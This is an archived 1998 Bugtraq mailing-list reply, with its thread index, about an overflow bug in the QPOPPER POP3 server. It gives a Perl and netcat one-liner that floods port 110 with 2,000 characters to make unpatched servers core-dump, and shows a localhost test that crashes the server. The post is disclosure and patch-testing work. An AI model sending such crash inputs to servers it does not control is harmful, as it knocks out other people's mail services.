Bugtraq mailing list archives
Re: QPOPPER problem....
From: jason () ACKLEY NET (Jason Ackley)
Date: Sat, 27 Jun 1998 09:35:54 -0700
On Sat, 27 Jun 1998, Tom Brown wrote: <snip>
perl -e 'print "e"x2000,"\r\nQUIT\r\n";' | nc -i 2 target 110 assuming you have netcat (nc) on your system... if not, just telnet to your server and paste something like 20 lines of solid characters into your telnet window... You'll get the -ERR response back... at which point unpatched servers should core dump... and you get "Connection closed by foreign host."
Stock BSDi 3.0(3.1) all the latest patches(M310-034) DOES core dump , but does not print out the 'ERR', so BSDi people may want to keep that in mind.. Example: $ perl -e 'print "e"x2000,"\r\nQUIT\r\n";' | nc -i 2 localhost 110 +OK QPOP (version 2.2-krb-IV) at llama.ackley.net starting. <<v2.2 <8667.898965122 () llama ackley net> $ ls -l /pop* ; date -rw------- 1 root wheel 155648 Jun 27 09:32 /popper.core Sat Jun 27 09:32:11 PDT 1998 $ I also tested with 2.4, and 2.41beta1, applying patches now and will see what it does.. Cheers, ----- Jason Ackley
Current thread:
- Re: !!! FLASH TRAFFIC !!! QPOPPER REMOTE ROOT EXPLOIT, (continued)
- Re: !!! FLASH TRAFFIC !!! QPOPPER REMOTE ROOT EXPLOIT Theo de Raadt (Jun 27)
- patch for qpopper remote exploit bug Roy Hooper (Jun 27)
- Re: patch for qpopper remote exploit bug Andres Kroonmaa (Jun 27)
- Re: patch for qpopper remote exploit bug Theo de Raadt (Jun 27)
- Re: patch for qpopper remote exploit bug Jon Lusky (Jun 27)
- Re: patch for qpopper remote exploit bug Benjamin J Stassart (Jun 27)
- Users can view script source from Win WebServers Aleph One (Jun 27)
- Re: patch for qpopper remote exploit bug Andres Kroonmaa (Jun 27)
- Re: QPOPPER problem.... ONE crude patch... Tom Brown (Jun 27)
- Re: QPOPPER problem.... ONE crude patch... Daniel Ryde (Jun 27)
- Re: QPOPPER problem.... ONE crude patch... Marco S Hyman (Jun 27)
- Re: QPOPPER problem.... Jason Ackley (Jun 27)
- Re: QPOPPER problem.... Bruno Lopes F. Cabral (Jun 27)
- patch: qpopper (plugs another hole too) Miquel van Smoorenburg (Jun 27)
- Re: QPOPPER problem.... Marco S Hyman (Jun 27)
- Re: QPOPPER problem.... Bruno Lopes F. Cabral (Jun 27)
- More patch ideas for qpopper Aaron D. Gifford (Jun 27)
- Re: QPOPPER problem.... Jeff Haas (Jun 27)
- Re: QPOPPER problem.... ONE crude patch... Daniel Ryde (Jun 27)
- Re: QPOPPER problem.... ONE crude patch... Yiorgos Adamopoulos (Jun 27)
- Re: QPOPPER problem.... ONE crude patch... Juan Diego Bolanhos Ramirez (Jun 27)
- Re: QPOPPER problem.... ONE crude patch... Bryan (Jun 27)
- NetBSD Security Advisory 1998-004: at(1) vulnerabilities. security-alert () NETBSD ORG (Jun 27)